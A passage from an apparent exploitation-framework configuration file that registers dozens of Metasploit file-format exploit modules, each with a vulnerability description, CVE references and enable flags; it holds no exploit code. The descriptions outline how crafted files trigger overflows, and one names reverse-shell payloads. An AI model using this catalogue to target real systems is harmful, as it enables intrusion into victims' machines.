data\n\ + \t\t\t\t\tstructure from the file to calculate a pointer offset without doing proper\n\ + \t\t\t\t\tvalidation. Attacker supplied data is then used to calculate the location of an\n\ + \t\t\t\t\tobject, and in turn a virtual function call. This results in arbitrary code\n\ + \t\t\t\t\texection.\n\n\ + \t\t\t\t\tNOTE: On some versions of Office, the user will need to dismiss a warning dialog\n\ + \t\t\t\t\tprior to the payload executing.\n\ + \t\t\t\t" + authors: + - - CVE + - 2009-3129 + - - OSVDB + - "59860" + - - MSB + - MS09-067 + - - BID + - "36945" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-09-083/ + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=832 + path: extensions/metasploit/ + class: Msf_module +msf_a-pdf_wav_to_mp3: + enable: true + msf: true + msf_key: windows/fileformat/a-pdf_wav_to_mp3 + name: A-PDF WAV to MP3 v1.0.0 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When\n\ + \t\t\t\tthe application is used to import a specially crafted m3u file, a buffer overflow occurs\n\ + \t\t\t\tallowing arbitrary code execution.\n\ + \t\t\t" + authors: + - - OSVDB + - "67241" + - - URL + - http://www.exploit-db.com/exploits/14676/ + - - URL + - http://www.exploit-db.com/exploits/14681/ + path: extensions/metasploit/ + class: Msf_module +msf_emc_appextender_keyworks: + enable: true + msf: true + msf_key: windows/fileformat/emc_appextender_keyworks + name: EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the KeyWorks KeyHelp Activex Control\n\ + \t\t\t\t(KeyHelp.ocx 1.2.3120.0). This Activex Control comes bundled with EMC's\n\ + \t\t\t\tDocumentation ApplicationXtender 5.4.\n\ + \t\t\t" + authors: + - - OSVDB + - "58423" + - - BID + - "36546" + path: extensions/metasploit/ + class: Msf_module +msf_adobe_libtiff: + enable: true + msf: true + msf_key: windows/fileformat/adobe_libtiff + name: Adobe Acrobat Bundled LibTIFF Integer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat\n\ + \t\t\t\tProfessional versions 8.0 through 8.2 and 9.0 through 9.3.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0188 + - - BID + - "38195" + - - OSVDB + - "62526" + - - URL + - http://www.adobe.com/support/security/bulletins/apsb10-07.html + - - URL + - http://secunia.com/blog/76/ + - - URL + - http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html + path: extensions/metasploit/ + class: Msf_module +msf_proshow_cellimage_bof: + enable: true + msf: true + msf_key: windows/fileformat/proshow_cellimage_bof + name: ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549.\n\ + \t\t\t\tAn attacker must send the file to victim and the victim must open the file.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3214 + - - OSVDB + - "57226" + - - URL + - http://www.exploit-db.com/exploits/9483 + - - URL + - http://www.exploit-db.com/exploits/9519 + path: extensions/metasploit/ + class: Msf_module +msf_etrust_pestscan: + enable: true + msf: true + msf_key: windows/fileformat/etrust_pestscan + name: CA eTrust PestPatrol ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in CA eTrust PestPatrol. When\n\ + \t\t\t\tsending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9)\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-4225 + - - OSVDB + - "60862" + - - URL + - http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm + path: extensions/metasploit/ + class: Msf_module +msf_safenet_softremote_groupname: + enable: true + msf: true + msf_key: windows/fileformat/safenet_softremote_groupname + name: SafeNet SoftRemote GROUPNAME Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in SafeNet SoftRemote\n\ + \t\t\t\tSecurity Policy Editor <= 10.8.5. When an attacker\n\ + \t\t\t\tcreates a specially formatted security policy with an\n\ + \t\t\t\toverly long GROUPNAME argument, it is possible to execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3861 + - - OSVDB + - "59660" + - - URL + - http://www.senseofsecurity.com.au/advisories/SOS-09-008 + path: extensions/metasploit/ + class: Msf_module +msf_mjm_quickplayer_s3m: + enable: true + msf: true + msf_key: windows/fileformat/mjm_quickplayer_s3m + name: MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a\n\ + \t\t\t\tand QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in\n\ + \t\t\t\tone of these 2 applications, a stack buffer overflow can be triggered, resulting in\n\ + \t\t\t\tarbitrary code execution.\n\n\ + \t\t\t\tThis exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7. \n\ + \t\t\t" + authors: + - - OSVDB + - "72102" + - - URL + - http://www.corelan.be/advisories.php?id=CORELAN-11-003 + path: extensions/metasploit/ + class: Msf_module +msf_mini_stream: + enable: true + msf: true + msf_key: windows/fileformat/mini_stream + name: Mini-Stream 3.0.1.1 Buffer Overflow Exploit + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Mini-Stream 3.0.1.1\n\ + \t\t\t\tBy creating a specially crafted pls file, an an attacker may be able\n\ + \t\t\t\tto execute arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "61341" + - - URL + - http://www.exploit-db.com/exploits/10745 + path: extensions/metasploit/ + class: Msf_module +msf_adobe_pdf_embedded_exe: + enable: true + msf: true + msf_key: windows/fileformat/adobe_pdf_embedded_exe + name: Adobe PDF Embedded EXE Social Engineering + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module embeds a Metasploit payload into an existing PDF file. The\n\ + \t\t\t\tresulting PDF can be sent to a target as part of a social engineering attack.\n\ + \t\t\t" + authors: + - - CVE + - 2010-1240 + - - OSVDB + - "63667" + - - URL + - http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/ + - - URL + - http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/ + - - URL + - http://blog.didierstevens.com/2010/03/29/escape-from-pdf/ + path: extensions/metasploit/ + class: Msf_module +msf_blazedvd_plf: + enable: true + msf: true + msf_key: windows/fileformat/blazedvd_plf + name: BlazeDVD 5.1 PLF Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack over flow in BlazeDVD 5.1. When\n\ + \t\t\t\t\tthe application is used to open a specially crafted plf file,\n\ + \t\t\t\t\ta buffer is overwritten allowing for the execution of arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2006-6199 + - - OSVDB + - "30770" + - - BID + - "35918" + path: extensions/metasploit/ + class: Msf_module +msf_fdm_torrent: + enable: true + msf: true + msf_key: windows/fileformat/fdm_torrent + name: Free Download Manager Torrent Parsing Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Free Download Manager\n\ + \t\t\t\t3.0 Build 844. Arbitrary code execution could occur when parsing a\n\ + \t\t\t\tspecially crafted torrent file.\n\ + \t\t\t" + authors: + - - CVE + - 2009-0184 + - - OSVDB + - "54033" + - - BID + - "33555" + - - URL + - http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/vmsBtDownloadManager.cpp?r1=11&r2=18 + - - URL + - http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/Bittorrent/fdmbtsupp/vmsBtFileImpl.cpp?r1=9&r2=18 + - - URL + - http://secunia.com/secunia_research/2009-5/ + - - URL + - http://downloads.securityfocus.com/vulnerabilities/exploits/33555-SkD.pl + path: extensions/metasploit/ + class: Msf_module +msf_xion_m3u_sehbof: + enable: true + msf: true + msf_key: windows/fileformat/xion_m3u_sehbof + name: Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Xion Audio Player prior to version\n\ + \t\t\t\t1.0.126. The vulnerability is triggered when opening a malformed M3U file that\n\ + \t\t\t\tcontains an overly long string. This results in overwriting a\n\ + \t\t\t\tstructured exception handler record.\n\ + \t\t\t" + authors: + - - OSVDB + - "66912" + - - URL + - http://www.exploit-db.com/exploits/14517 + - - URL + - http://www.exploit-db.com/exploits/14633 + - - URL + - http://www.exploit-db.com/exploits/15598 + path: extensions/metasploit/ + class: Msf_module +msf_orbital_viewer_orb: + enable: true + msf: true + msf_key: windows/fileformat/orbital_viewer_orb + name: Orbital Viewer ORB File Parsing Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in David Manthey's\n\ + \t\t\t\tOrbital Viewer. When processing .ORB files, data is read from file into\n\ + \t\t\t\ta fixed-size stack buffer using the fscanf function. Since no bounds\n\ + \t\t\t\tchecking is done, a buffer overflow can occur. Attackers can execute\n\ + \t\t\t\tarbitrary code by convincing their victim to open an ORB file.\n\ + \t\t\t" + authors: + - - BID + - "38436" + - - OSVDB + - "62580" + - - CVE + - 2010-0688 + - - URL + - http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/ + - - URL + - http://www.exploit-db.com/exploits/11581 + path: extensions/metasploit/ + class: Msf_module +msf_ms10_004_textbytesatom: + enable: true + msf: true + msf_key: windows/fileformat/ms10_004_textbytesatom + name: Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow vulnerability in the handling of\n\ + \t\t\t\tthe TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft,\n\ + \t\t\t\tthe PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as\n\ + \t\t\t\tOffice 2004 for Mac, are vulnerable.\n\n\ + \t\t\t\tNOTE: The vulnerable code path is not reachable on versions of Windows prior to\n\ + \t\t\t\tWindows Vista.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0033 + - - OSVDB + - "62241" + - - MSB + - MS10-004 + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-10-017/ + - - URL + - http://www.snoop-security.com/blog/index.php/2010/03/exploiting-ms10-004-ppt-viewer/ + path: extensions/metasploit/ + class: Msf_module +msf_videolan_tivo: + enable: true + msf: true + msf_key: windows/fileformat/videolan_tivo + name: VideoLAN VLC TiVo Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in VideoLAN VLC 0.9.4.\n\ + \t\t\t\tBy creating a malicious TY file, a remote attacker could overflow a\n\ + \t\t\t\tbuffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-4654 + - - OSVDB + - "49181" + - - BID + - "31813" + path: extensions/metasploit/ + class: Msf_module +msf_visio_dxf_bof: + enable: true + msf: true + msf_key: windows/fileformat/visio_dxf_bof + name: Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack based overflow vulnerability in the handling\n\ + \t\t\t\tof the DXF files by Microsoft Visio 2002. Revisions prior to the release of\n\ + \t\t\t\tthe MS bulletin MS10-028 are vulnerable. The overflow occurs when the application\n\ + \t\t\t\tis used to import a specially crafted DXF file, while parsing the HEADER section\n\ + \t\t\t\tof the DXF file.\n\n\ + \t\t\t\tTo trigger the vulnerability an attacker must convince someone to insert a\n\ + \t\t\t\tspecially crafted DXF file to a new document, go to 'Insert' -> 'CAD Drawing'\n\ + \t\t\t\t" + authors: + - - CVE + - 2010-1681 + - - OSVDB + - "64446" + - - BID + - "39836" + - - URL + - http://www.coresecurity.com/content/ms-visio-dxf-buffer-overflow + - - URL + - http://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/ + path: extensions/metasploit/ + class: Msf_module +msf_audiotran_pls: + enable: true + msf: true + msf_key: windows/fileformat/audiotran_pls + name: Audiotran 1.4.1 (PLS File) Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in Audiotran 1.4.1.\n\ + \t\t\t\tAn attacker must send the file to victim and the victim must open the file.\n\ + \t\t\t\tAlternatively it may be possible to execute code remotely via an embedded\n\ + \t\t\t\tPLS file within a browser, when the PLS extention is registered to Audiotran.\n\ + \t\t\t\tThis functionality has not been tested in this module.\n\ + \t\t\t" + authors: + - - CVE + - 2009-0476 + - - OSVDB + - "55424" + - - URL + - http://www.exploit-db.com/exploits/11079 + path: extensions/metasploit/ + class: Msf_module +msf_moxa_mediadbplayback: + enable: true + msf: true + msf_key: windows/fileformat/moxa_mediadbplayback + name: MOXA MediaDBPlayback ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When\n\ + \t\t\t\tsending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "68986" + - - URL + - http://www.moxa.com + path: extensions/metasploit/ + class: Msf_module +msf_ultraiso_cue: + enable: true + msf: true + msf_key: windows/fileformat/ultraiso_cue + name: UltraISO CUE File Parsing Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in EZB Systems, Inc's\n\ + \t\t\t\tUltraISO. When processing .CUE files, data is read from file into a\n\ + \t\t\t\tfixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n\ + \t\t\t\tcan occur. Attackers can execute arbitrary code by convincing their victim\n\ + \t\t\t\tto open an CUE file.\n\n\ + \t\t\t\tNOTE: A file with the same base name, but the extension of \"bin\" must also\n\ + \t\t\t\texist. Opening either file will trigger the vulnerability, but the files must\n\ + \t\t\t\tboth exist.\n\ + \t\t\t" + authors: + - - CVE + - 2007-2888 + - - OSVDB + - "36570" + - - BID + - "24140" + - - URL + - http://www.exploit-db.com/exploits/3978 + path: extensions/metasploit/ + class: Msf_module +msf_activepdf_webgrabber: + enable: true + msf: true + msf_key: windows/fileformat/activepdf_webgrabber + name: activePDF WebGrabber ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When\n\ + \t\t\t\tsending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)\n\ + \t\t\t\tan attacker may be able to execute arbitrary code. This control is not marked safe\n\ + \t\t\t\tfor scripting, so choose your attack vector accordingly.\n\n\ + \t\t\t" + authors: + - - OSVDB + - "64579" + - - URL + - http://www.activepdf.com/products/serverproducts/webgrabber/ + path: extensions/metasploit/ + class: Msf_module +msf_nuance_pdf_launch_overflow: + enable: true + msf: true + msf_key: windows/fileformat/nuance_pdf_launch_overflow + name: Nuance PDF Reader v6.0 Launch Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is\n\ + \t\t\t\t\ttriggered when opening a malformed PDF file that contains an overly long string in a /Launch field. This results in overwriting a structured exception handler record.\n\ + \t\t\t\t\tThis exploit does not use javascript.\n\ + \t\t\t" + authors: + - - OSVDB + - "68514" + - - URL + - http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-062-stack-buffer-overflow-in-nuance-pdf-reader-v6-0/ + path: extensions/metasploit/ + class: Msf_module +msf_lotusnotes_lzh: + enable: true + msf: true + msf_key: windows/lotus/lotusnotes_lzh + name: Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview(.lzh attachment) + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n\ + \t\t\t\tparsing a malformed, specially crafted LZH file. This vulnerability was\n\ + \t\t\t\tdiscovered binaryhouse.net\n\n\ + \t\t\t" + authors: + - - CVE + - 2011-1213 + - - OSVDB + - "72706" + - - BID + - "48018" + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904 + - - URL + - http://www.ibm.com/support/docview.wss?uid=swg21500034 + path: extensions/metasploit/ + class: Msf_module +msf_vuplayer_cue: + enable: true + msf: true + msf_key: windows/fileformat/vuplayer_cue + name: VUPlayer CUE Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack over flow in VUPlayer <= 2.49. When\n\ + \t\t\t\tthe application is used to open a specially crafted cue file, an buffer is overwritten allowing\n\ + \t\t\t\tfor the execution of arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "64581" + - - BID + - "33960" + path: extensions/metasploit/ + class: Msf_module +msf_mcafee_hercules_deletesnapshot: + enable: true + msf: true + msf_key: windows/fileformat/mcafee_hercules_deletesnapshot + name: McAfee Remediation Client ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. When\n\ + \t\t\t\tsending an overly long string to the DeleteSnapshot() method\n\ + \t\t\t\tof enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code.\n\ + \t\t\t\tThis control is not marked safe for scripting, so choose your attack vector accordingly.\n\ + \t\t\t" + authors: + - - URL + - http://www.metasploit.com + path: extensions/metasploit/ + class: Msf_module +msf_vlc_smb_uri: + enable: true + msf: true + msf_key: windows/fileformat/vlc_smb_uri + name: VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in the Win32AddConnection\n\ + \t\t\t\tfunction of the VideoLAN VLC media player. Versions 0.9.9 throught 1.0.1 are\n\ + \t\t\t\treportedly affected.\n\n\ + \t\t\t\tThis vulnerability is only present in Win32 builds of VLC.\n\n\ + \t\t\t\tThis payload was found to work with the windows/exec and\n\ + \t\t\t\twindows/meterpreter/reverse_tcp payloads. However, the\n\ + \t\t\t\twindows/meterpreter/reverse_ord_tcp was found not to work.\n\ + \t\t\t" + authors: + - - BID + - "35500" + - - OSVDB + - "55509" + - - CVE + - 2009-2484 + - - URL + - http://git.videolan.org/?p=vlc.git;a=commit;h=e60a9038b13b5eb805a76755efc5c6d5e080180f + - - URL + - http://milw0rm.com/exploits/9209 + - - URL + - http://www.exploit-db.com/exploits/9029 + path: extensions/metasploit/ + class: Msf_module +msf_foxit_reader_filewrite: + enable: true + msf: true + msf_key: windows/fileformat/foxit_reader_filewrite + name: Foxit PDF Reader 4.2 Javascript File Write + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an unsafe Javascript API implemented in Foxit PDF Reader\n\ + \t\t\t\t\tversion 4.2. The createDataObject() Javascript API function allows for writing\n\ + \t\t\t\t\tarbitrary files to the file system. This issue was fixed in version 4.3.1.0218.\n\ + \t\t\t\t\t\n\ + \t\t\t\t\tNote: This exploit uses the All Users directory currently, which required \n\ + \t\t\t\t\tadministrator privileges to write to. This means an administrative user has to\n\ + \t\t\t\t\topen the file to be successful. Kind of lame but thats how it goes sometimes in\n\ + \t\t\t\t\tthe world of file write bugs.\n\ + \t\t\t" + authors: + - - OSVDB + - "71104" + - - URL + - http://scarybeastsecurity.blogspot.com/2011/03/dangerous-file-write-bug-in-foxit-pdf.html + path: extensions/metasploit/ + class: Msf_module +msf_hhw_hhp_indexfile_bof: + enable: true + msf: true + msf_key: windows/fileformat/hhw_hhp_indexfile_bof + name: HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HTML Help Workshop 4.74\n\ + \t\t\t\t\tBy creating a specially crafted hhp file, an an attacker may be able\n\ + \t\t\t\t\tto execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-0133 + - - BID + - "33189" + - - OSVDB + - "22941" + - - URL + - http://www.exploit-db.com/exploits/10323 + - - URL + - http://www.exploit-db.com/exploits/10335 + path: extensions/metasploit/ + class: Msf_module +msf_msworks_wkspictureinterface: + enable: true + msf: true + msf_key: windows/fileformat/msworks_wkspictureinterface + name: Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit + category: Metasploit + description: "\n\ + \t\t\t\t\tThe Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker\n\ + \t\t\t\tto execute arbitrary code on a system. By passing a negative integer to the\n\ + \t\t\t\tWksPictureInterface method, an attacker could execute arbitrary code on the system\n\ + \t\t\t\twith privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6.\n\ + \t\t\t\tThis control is not marked safe for scripting, please choose your attack vector carefully.\n\ + \t\t\t" + authors: + - - CVE + - 2008-1898 + - - OSVDB + - "44458" + path: extensions/metasploit/ + class: Msf_module +msf_vlc_modplug_s3m: + enable: true + msf: true + msf_key: windows/fileformat/vlc_modplug_s3m + name: VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an input validation error in libmod_plugin as\n\ + \t\t\t\tincluded with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9\n\ + \t\t\t\tare affected. By creating a malicious S3M file, a remote attacker\n\ + \t\t\t\tcould execute arbitrary code.\n\n\ + \t\t\t\tAlthough other products that bundle libmodplug may be vulnerable, this\n\ + \t\t\t\tmodule was only tested against VLC.\n\n\ + \t\t\t\tNOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n\ + \t\t\t\tpermanently enable NX support on machines that support it. As such,\n\ + \t\t\t\tthis module is capable of bypassing DEP, but not ASLR.\n\ + \t\t\t" + authors: + - - CVE + - 2011-1574 + - - OSVDB + - "72143" + - - URL + - http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b + - - URL + - http://hackipedia.org/File%20formats/Music/html/s3mformat.php + - - URL + - https://www.sec-consult.com/files/20110407-0_libmodplug_stackoverflow.txt + - - URL + - http://seclists.org/fulldisclosure/2011/Apr/113 + path: extensions/metasploit/ + class: Msf_module +msf_aol_desktop_linktag: + enable: true + msf: true + msf_key: windows/fileformat/aol_desktop_linktag + name: AOL Desktop 9.6 RTX Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability found in AOL Desktop 9.6's Tool\\rich.rct\n\ + \t\t\t\tcomponent. By supplying a long string of data in the hyperlink tag, rich.rct copies\n\ + \t\t\t\tthis data into a buffer using a strcpy function, which causes an overflow, and\n\ + \t\t\t\tresults arbitrary code execution.\n\ + \t\t\t" + authors: + - - OSVDB + - "70741" + - - URL + - http://www.exploit-db.com/exploits/16085/ + path: extensions/metasploit/ + class: Msf_module +msf_ms10_087_rtf_pfragments_bof: + enable: true + msf: true + msf_key: windows/fileformat/ms10_087_rtf_pfragments_bof + name: Microsoft Word RTF pFragments Stack Buffer Overflow (File Format) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in the handling of the\n\ + \t\t\t\t'pFragments' shape property within the Microsoft Word RTF parser. All versions\n\ + \t\t\t\tof Microsoft Office 2010, 2007, 2003, and XP prior to the release of the\n\ + \t\t\t\tMS10-087 bulletin are vulnerable.\n\n\ + \t\t\t\tThis module does not attempt to exploit the vulnerability via Microsoft Outlook.\n\n\ + \t\t\t\tThe Microsoft Word RTF parser was only used by default in versions of Microsoft\n\ + \t\t\t\tWord itself prior to Office 2007. With the release of Office 2007, Microsoft\n\ + \t\t\t\tbegan using the Word RTF parser, by default, to handle rich-text messages within\n\ + \t\t\t\tOutlook as well. It was possible to configure Outlook 2003 and earlier to use\n\ + \t\t\t\tthe Microsoft Word engine too, but it was not a default setting.\n\n\ + \t\t\t\tIt appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that\n\ + \t\t\t\tMicrosoft will confirm or deny this since Office 2000 has reached its support\n\ + \t\t\t\tcycle end-of-life.\n\ + \t\t\t" + authors: + - - CVE + - 2010-3333 + - - OSVDB + - "69085" + - - MSB + - MS10-087 + - - BID + - "44652" + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880 + path: extensions/metasploit/ + class: Msf_module +msf_hhw_hhp_compiledfile_bof: + enable: true + msf: true + msf_key: windows/fileformat/hhw_hhp_compiledfile_bof + name: HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HTML Help Workshop 4.74\n\ + \t\t\t\tBy creating a specially crafted hhp file, an an attacker may be able\n\ + \t\t\t\tto execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2006-0564 + - - OSVDB + - "22941" + - - URL + - http://www.exploit-db.com/exploits/1488 + - - URL + - http://www.exploit-db.com/exploits/1490 + path: extensions/metasploit/ + class: Msf_module +msf_feeddemon_opml: + enable: true + msf: true + msf_key: windows/fileformat/feeddemon_opml + name: FeedDemon <= 3.1.0.12 Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application\n\ + \t\t\t\tis used to import a specially crafted opml file, a buffer overflow occurs allowing\n\ + \t\t\t\tarbitrary code execution.\n\n\ + \t\t\t\tAll versions are suspected to be vulnerable. This vulnerability was originally reported\n\ + \t\t\t\tagainst version 2.7 in February of 2009.\n\ + \t\t\t" + authors: + - - CVE + - 2009-0546 + - - OSVDB + - "51753" + - - BID + - "33630" + - - URL + - http://www.exploit-db.com/exploits/7995 + - - URL + - http://www.exploit-db.com/exploits/8010 + - - URL + - http://www.exploit-db.com/exploits/11379 + path: extensions/metasploit/ + class: Msf_module +msf_ms11_006_createsizeddibsection: + enable: true + msf: true + msf_key: windows/fileformat/ms11_006_createsizeddibsection + name: Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in the handling of thumbnails\n\ + \t\t\t\twithin .MIC files and various Office documents. When processing a thumbnail bitmap\n\ + \t\t\t\tcontaining a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This\n\ + \t\t\t\tleads to arbitrary code execution.\n\n\ + \t\t\t\tIn order to trigger the vulnerable code, the folder containing the document must be\n\ + \t\t\t\tviewed using the \"Thumbnails\" view.\n\ + \t\t\t" + authors: + - - CVE + - 2010-3970 + - - OSVDB + - "70263" + - - MSB + - MS11-006 + - - BID + - "45662" + - - URL + - http://www.microsoft.com/technet/security/advisory/2490606.mspx + - - URL + - http://www.powerofcommunity.net/schedule.html + path: extensions/metasploit/ + class: Msf_module +msf_visiwave_vwr_type: + enable: true + msf: true + msf_key: windows/fileformat/visiwave_vwr_type + name: VisiWave VWR File Parsing Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a vulnerability found in VisiWave's Site Survey Report application.\n\ + \t\t\t\tWhen processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'\n\ + \t\t\t\tproperty (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',\n\ + \t\t\t\t'Image'), but if a match isn't found, the function that's supposed to handle this routine\n\ + \t\t\t\tends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10]\n\ + \t\t\t\tinstruction. This allows attackers to overwrite it with any arbitrary value, and results code\n\ + \t\t\t\texecution. A patch is available at visiwave.com; the fix is done by XORing the return value as\n\ + \t\t\t\tnull if no match is found, and then it is validated before use.\n\n\ + \t\t\t\tNOTE: During installation, the application will register two file handle's, VWS and VWR and allows a\n\ + \t\t\t\tvictim user to 'double click' the malicious VWR file and execute code. This module was also built\n\ + \t\t\t\tto bypass ASLR and DEP.\n\ + \t\t\t" + authors: + - - CVE + - 2011-2386 + - - OSVDB + - "72464" + - - URL + - http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html + - - URL + - http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20 + path: extensions/metasploit/ + class: Msf_module +msf_mediajukebox: + enable: true + msf: true + msf_key: windows/fileformat/mediajukebox + name: Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Media Jukebox 8.0.400\n\ + \t\t\t\tBy creating a specially crafted m3u or pls file, an an attacker may be able\n\ + \t\t\t\tto execute arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "55924" + - - CVE + - 2009-2650 + path: extensions/metasploit/ + class: Msf_module +msf_microp_mppl: + enable: true + msf: true + msf_key: windows/fileformat/microp_mppl + name: MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow + category: Metasploit + description: " \n\ + \t\t\t\t\tThis module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based\n\ + \t\t\t\tbuffer overflow occurs when the content of a .mppl file gets copied onto the stack,\n\ + \t\t\t\twhich overwrites the lpFileName parameter of a CreateFileA() function, and results\n\ + \t\t\t\tarbitrary code execution under the context of the user.\n\ + \t\t\t" + authors: + - - OSVDB + - "73627" + - - URL + - http://www.exploit-db.com/exploits/14720 + path: extensions/metasploit/ + class: Msf_module +msf_sascam_get: + enable: true + msf: true + msf_key: windows/fileformat/sascam_get + name: SasCam Webcam Server 